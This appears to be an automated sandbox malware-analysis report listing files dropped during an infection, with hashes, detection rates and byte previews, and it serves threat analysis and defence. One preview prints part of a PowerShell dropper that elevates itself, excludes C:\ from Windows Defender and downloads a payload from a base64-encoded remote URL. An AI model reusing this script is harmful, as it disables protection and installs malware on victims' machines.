Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Recovery\2ad47189800c09

Download File

Process:	C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe
File Type:	ASCII text, with very long lines (879), with no line terminators
Category:	dropped
Size (bytes):	879
Entropy (8bit):	5.901736129671469
Encrypted:	false
SSDEEP:	24:9uuRPfdTPlo+leH2olKiz8BsUDuJL/eDCc/fP4B:vLJo+GHYXBLDSL/eNc
MD5:	E62DE2FD895D4664C5CD6AB71EFF36D2
SHA1:	B281E7C719B16D405645A84D39D84272E8DEF6E9
SHA-256:	B684CF2D5A23F53C15B03A140E892997479FB150AE8C002901F1F195EBE947C3
SHA-512:	491060675248211DDA353CA6545EED4B3B6FB9D8869DAB1F5B695FE70477803CEBEE9E76C836AE1F2117FB1D0C1F67A8A7B349504382F019783DDB39F6FCAD3B
Malicious:	false
Preview:	Mm5IAcqqSDfXhPxxRba6Min16GEcxXOnLkHaA0qDxTemwVzp2azGEDqo8EL3XN35z1L6HXwavWJ2DBElRYjWiHjI4dc5pxqjZix4J3ifnYVr4xk69jm8ohXrSDBo41v8qjdfOJbY0EsJv1NH2f6FKr52LFmF13kwnXBUTFs0IOHkzN6az4vZ4px9nlUIgVg7d5gX03xxwF75jVC7JMQ7HK17jCqsvjTwsKG3rij6G8nzs2ZSiW9UFizSDjyyMFBMwKNYOJPlmT0JhCPrmYJYk8qJVyzItvtB6aChoBDZGXrvspuAUGMy5nmxeEDaTH11kzMG9rClUuRMR4bpDzxni4FTyPDk7nF8g0L2cnBmDleKWZgjmXWeUNSpu3SuocnrpSqbtiMaxLj7a46Zte7jRloShfIiVQ7l7wfDsEzEL6qIoUPz72AKeEaEnY3NanEhO8AnY3qoo3YV4goMQSlcPxG3WbaULmnh1J4pUlaDMWglpFJGtq6HBlRa1HR7dVdCP0dvm82p1iQ3RfNRSTlepffQ1dxNTdk03dVzlYeuyQPdUXJV3AoJu8WtVN3JLoWY7ZAxKYp4y0pYQB5eTbTTyaG4GleYeVjJ41g5XWLfUuV4T8dTSZztVDjgTFqi4RZcQfeYfAG6Qx8EFLlIIKGFf0y1R9lRqmlDV2nxeEyRS3dhEfaHeiatKT7armHfYyQnM4sNiynDWywmXQwvidxHL22B5NF17S3dmzVJwNjq4XWWgUDa0V65BIbTCrSUswFE5TAh5m9V3GNyfgekJoBmW7bdXCHF5O8IRSbNTffNWlB55nxfMrKDuds71gK2e3ZoIFhNFQRnJyQu6giuOm2OD4XykdVxVmscLWwzGka6ag46N7A

C:\Recovery\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe

Download File

Process:	C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1709568
Entropy (8bit):	4.871474066048546
Encrypted:	false
SSDEEP:	24576:2YCGLO9L8YXprwCw7lTxvvNlm5hK+iYBKUOzXQAY671:3CGq9pXprWu/XhtA
MD5:	579FD24F4CACC972F63F47214F9C3C34
SHA1:	20BE9C6E9AA29D57B670D6809FFAD1786A8508E5
SHA-256:	F80BD8EB42194DF565E3152D35BAD6A40FDAE70E221E9E66873587BFFB73D64B
SHA-512:	1A8F7918B931FA10CBC4B47A88405C0B28255360AC27E1D44BA00554186ED20139FBAAA278A362C34A20083F4FFF30DC83876C3F382397F831F781FB6A9AAB91
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 68%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.........."..................-... ...@....@.. ..............................K.....@..................................,..K....@..p....................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc...p....@......................@..@.reloc.......`......................@..B.................-......H...........@[..........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\wVBhC3KCkV.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1613
Entropy (8bit):	5.370675888495854
Encrypted:	false
SSDEEP:	48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHmHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKktGqZ4x
MD5:	CFCC907668E9B1AED46D457F77536393
SHA1:	5FD7371DBA3004E2BC1A83BA5C8AD4BD90FC2D28
SHA-256:	414415C15FF1C315E383F642F353A36B24005E012073C05CC72A71173D6604CF
SHA-512:	405A279EA079FAF8C38926EE256DEB2A4541C9752836C5BDE3E435A3437A3E95F086B1A4911BF19440341011771D46E1B1364C5FECEB21277EC0683367DFA4AE
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\KeaEfrP[1].ps1

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	2687
Entropy (8bit):	5.8498231062537185
Encrypted:	false
SSDEEP:	48:cDYmPROAA5Ae/LUIslWc9Q1P3ZC5tlh1xmtqlx3t9wq7Ufl71tT0m23dB:dmPEksoWFPJCt0MPQq7Ol71x0r
MD5:	62E668D5993865A150073479BDC42EC5
SHA1:	B2B4E7767C5B0C9218127401C8D8B8723148FFC7
SHA-256:	EA4B7480D291E1E3EC6029BC92C3C732D005AD215518E8C483388B8227F4DD52
SHA-512:	6BA4FE44398B89A82804013151A73F4AA00BE9468D76CF2B40FE7A410C4D646C84AB10F2561FED694EE0B3A24BD50F46A75427097996BE171A83F671196B0CBC
Malicious:	false
Preview:	.# ..............if (-not ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) {.. Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File `"$PSCommandPath`"" -Verb RunAs.. exit..}....# .. Windows Defender .......Try {.. Add-MpPreference -ExclusionPath 'C:\' -ErrorAction SilentlyContinue..} Catch {.. # ........}....# .......... URL..$encoded_url = "aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4="..$output = "$env:TEMP\downloaded_file.bin"....# ............. URL..Try {.. Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($encoded_url))) -OutFile $output -UseBasicParsing -ErrorAction SilentlyContinue..} Catch {.. # ........}....# ....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2836992
Entropy (8bit):	6.480254219926058
Encrypted:	false
SSDEEP:	49152:wIE9mxOKwsEwbhemM7BGQymMzseq66ocT1ToRNoGSmLWFBi:5E9m1wsEwbhzM78AMzXq5JB0RNlWFBi
MD5:	621B054C0290A4D573529190298DD18B
SHA1:	EA4BFCE6334D6D77F88BA754F9211834CF61B376
SHA-256:	AFAA690E5981CB82489B18AF39A1B1B2A3C21DEA26B4F2764B905A79733BBF1C
SHA-512:	995D50BC196F381C11FD4F6540F6A0E784D9453648B901810B6FA4B5DC17797BC1DDFB2E3F1F71D002DD4513D59E62189A1A6CB6F877F1E9F932A3971E1A00A6
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 45%
Preview:	MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$............+.. ...`....@.. ........................,.......+...`.................................U...i....`.............................................................................................................. . .@... ....... ..............@....rsrc........`.......2..............@....idata . ...........8..............@...cvbdjiir..+.......*..:..............@...klvbmdih. ....+......"+.............@....taggant.@....+.."...(+.............@...................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1806336
Entropy (8bit):	7.944492891707347
Encrypted:	false
SSDEEP:	49152:lhlvBjgj6YHUv4NTwra7Z21TU2VeZenXW1:pBjxSUgNTwroMrV41
MD5:	807928C7C8D81BF2C9F4AB5BA2F4763B
SHA1:	C48A08C824E5E273297C333C8E5B1E766F2BA8C2
SHA-256:	2A3BBA0C74C6ECAB8AB9E722A3D2C19866D930C7F79A732AD6A0D24378A6836C
SHA-512:	1496151D3615E25E9A8D8CAC8EF62FA18AB0D3B1C6D366B7683A4A7B4B65296ABB31A2675FBEBB23DAC2227FB21BCB1886500C566B617FD0C40D34D74AE0918F
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 45%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d..d..d....s.\|....F.i....r.^..m.[.g..m.K.b....g..d.......w.w....E.e..Richd..........PE..L....dTg.....................(........i...........@..........................0i......Q....@.................................M.$.a.....$.......................$..................................................................................... . ..$......h..................@....rsrc.........$......x..............@....idata ......$......z..............@... .@*...$......\|..............@...ykpsajjh......O......~..............@...lvskadyv......h......h..............@....taggant.0....i.."...n..............@...................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\wTMEVe8[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4122624
Entropy (8bit):	7.9860936541574965
Encrypted:	false
SSDEEP:	98304:1VtCpBXG8uKobY22R0pbuov/BXG8uKobY22R0pbuovJ:2ghSRaCo3ghSRaCoR
MD5:	5DB95C4DE9B6E98C653AC3DEC5DCE83D
SHA1:	C3E1CB98B5450D21C8E9E975148C282AFCF4CCAE
SHA-256:	8AC4F1DCDF7CE5276D4EE9DBDAEAA4232AA8AD0C383BF804472F156AE2A879C7
SHA-512:	42E5504904F0DB4E62D56C03C8E7E302DF0EBA488A966259AA686E7D952DB8A25EB56B5AC72731400CFD2541B6429D82E95E3BB8E87565BDF0CBE2B488C47368
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 26%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Ug..........................................@..........................0?...........@..................................<..<....................................................................................>...............................text............................... ..`.rdata..............................@..@.data....'...`.......L..............@....tls.................d..............@....rsrc................f..............@..@.reloc........... ...h..............@..B.bss................................@....bss..........!......8!.............@...........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\ntRoEwh[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2343424
Entropy (8bit):	7.978016442035459
Encrypted:	false
SSDEEP:	49152:pHx/9iRLusgfLziEqFhJ5v96Adh3BeNHdbOTPixC30tP0MQ:DURLyU95JdhGda7wcM
MD5:	3541C1AC26EB5BBB87F01C20FD9F8824
SHA1:	BF5D136C911491F59BDEB3BF37B8F1A155FD3A97
SHA-256:	B7CD929CE4D0FA849EEAB8A216E1333F63C7D3530DA674F163EFAB4DAE3439D1
SHA-512:	BABC17723D2389919ACD96F977821D57BDD737F01A9598209EFAFA72AE0418E914A5D229F196D80CB5BA70CE82B0F340B18AA255BBE4ED77D821A432D5794A93
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 18%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D..e...6...6...6..7...6..7...6..7...6..7...6...6...6..7...6..o6...6..7...6Rich...6................PE..d................."......\|...B#................@............................. $.......$...`.......... ......................................<.............#...................$. .......T...........................................(... ............................text....{.......\|.................. ..`.rdata...".......$..................@..@.data...............................@....pdata..............................@..@.rsrc.... #.......#.................@..@.reloc.. .....$.......#.............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	971264
Entropy (8bit):	6.704889214663898
Encrypted:	false
SSDEEP:	24576:jqDEvCTbMWu7rQYlBQcBiT6rprG8aJtd:jTvC/MTQYxsWR7aJ
MD5:	EF28C394DDDD56CEBAD7E246ABB81976
SHA1:	2CD690B87BD0C30FB902C8E1C6BAF442BC990CBC
SHA-256:	30FBE2751C7EF6BB10FAE76789B2D980C216BB97764270361A521074E86FA982
SHA-512:	943EF2AD3BE1AC5E3773CFAAD91368F59F01BB4E23C1B6F4148EAA696774A640C3380ED8FC28855F122D52BB420575E1971F1662A7DFF0A4BCAAF8D8719FC95B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 18%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L...^.Ug..........".........."......w.............@..........................0......v.....@...@.......@.....................d...\|....@...f.......................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc....f...@...h..................@..@.reloc...u.......v...\..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\json[1].json

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1787
Entropy (8bit):	5.371380776424351
Encrypted:	false
SSDEEP:	48:SfNaoQqSuSVTEQqSrfNaoQI22QqfNaoQhQafNaoQo0UrU0U8Qt:6NnQxTEQFNnQI22QyNnQhQiNnQo0UrUd
MD5:	821F0802D0EDBDBA0E80E1DC35E934D7
SHA1:	2CC3811F81FC618C6EDC53158631C68D364F8B8C
SHA-256:	CF8802DE21E1290DF4CD43E86E0124FEB70563D8BB41315CDECB985B23587F7A
SHA-512:	71F7F7896E4A75ABEAADA26A5DE05A84D4DD8571243CDD060FB9D77A67BDD3BBBF450450E03C1720ECAF193D9662354EFC9DD7DA82DC0F28F71521F730C242C2
Malicious:	false
Preview:	[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/89AAFE8E30C133A41C036A80B1542A31",.. "id": "89AAFE8E30C133A41C036A80B1542A31",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/89AAFE8E30C133A41C036A80B1542A31"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/0A8A39ED589407F98B81FFF2F40CFB3A",.. "id": "0A8A39ED589407F98B81FFF2F40CFB3A",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/0A8A39ED589407F98B81FFF2F40CFB3A"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtoo

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1856512
Entropy (8bit):	7.947997173099362
Encrypted:	false
SSDEEP:	49152:Gv9/gAPCg/RIplwfHY/ZgQxj5Rm/ZspSewKLj:k7IpSHY/Z9CZr2L
MD5:	78CBDC5E45F97CA8C6E6E72D99BD5BF1
SHA1:	04D0822E1C4D5862F4477D815A3063B8245E74BD
SHA-256:	56E13B09B7D9ABFB9F0C6656DD1E4CA9ED07005F463AE108B8AB2E7540A4DCDF
SHA-512:	FB296A0E07012F72CEA789B6A2F5A6744F0A689EFB69DEFE51676F2806A77B146117672786FAEC10AB15A6DDEEAA640782E5239A1672517FAADD07233E200372
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 37%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Ug..............................I...........@...........................I.....A&....@.................................\@..p....0.......................A...................................................................................... . . .......B..................@....rsrc........0.......R..............@....idata .....@.......V..............@... .@*..P.......X..............@...nywettin....../......Z..............@...pnoojtlk.....pI......,..............@....taggant.0....I.."...2..............@...................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	15612
Entropy (8bit):	5.0007665989277985
Encrypted:	false
SSDEEP:	384:d1VoGIpN6KQkj2qkjh4iUxehQVKoxOdBMNXp5rvOjJiYo0ib4J:d1V3IpNBQkj2Ph4iUxehYKoxOdBMNZd4
MD5:	A8D66A40EEA8831B03CDC478ED797E6E
SHA1:	F2DB655B7A8F6A211E8F6D95B50B3D7BC325F7CE
SHA-256:	09178396408F3B27CBE725A8A455B37894EE4A3DBFCC34636DD23E96AB97C8CA
SHA-512:	33C1DA734E45158C61EA1679202BAA3813C71901C9B5D481A09F244C9653C4DD76C1CD12378468579595C3C8CC92F60E868982BB26236841CDAE7BDB5B455C8F
Malicious:	false
Preview:	PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.2121427290103626
Encrypted:	false
SSDEEP:	3:NlllulEtlllZ:NllUEtll
MD5:	D9E5C0B7F2801066EB28AB27FF283940
